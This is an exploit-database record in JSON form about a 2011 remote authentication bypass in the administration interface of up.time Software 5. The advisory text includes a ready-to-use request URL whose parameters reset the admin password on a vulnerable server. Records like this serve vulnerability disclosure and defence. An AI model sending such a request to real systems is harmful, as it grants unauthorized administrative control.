Description
up.time Software 5 - Administration Interface Remote Authentication Bypass
{"lastseen": "2020-04-01T19:06:08", "references": [], "description": "\nup.time Software 5 - Administration Interface Remote Authentication Bypass", "edition": 1, "reporter": "James Burton", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2011-04-27T00:00:00", "title": "up.time Software 5 - Administration Interface Remote Authentication Bypass", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 1.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-04-27T00:00:00", "id": "EXPLOITPACK:3127FA34A4862DBC6DC70CAED3AA3314", "href": "", "viewCount": 8, "sourceData": "source: https://www.securityfocus.com/bid/47599/info\n\nup.time software is prone to a remote authentication-bypass vulnerability.\n\nAttackers can exploit this issue to bypass authentication and perform unauthorized actions.\n\nup.time 5 is vulnerable; other versions may also be affected.\n\nhttp://www.example.com:9999/index.php?userid=admin\n&firstTimeLogin=True\n&password=admin\n&confirmPassword=admin\n&adminEmail=admin () admin\n&monitorEmail=admin () admin", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645639915}}
{}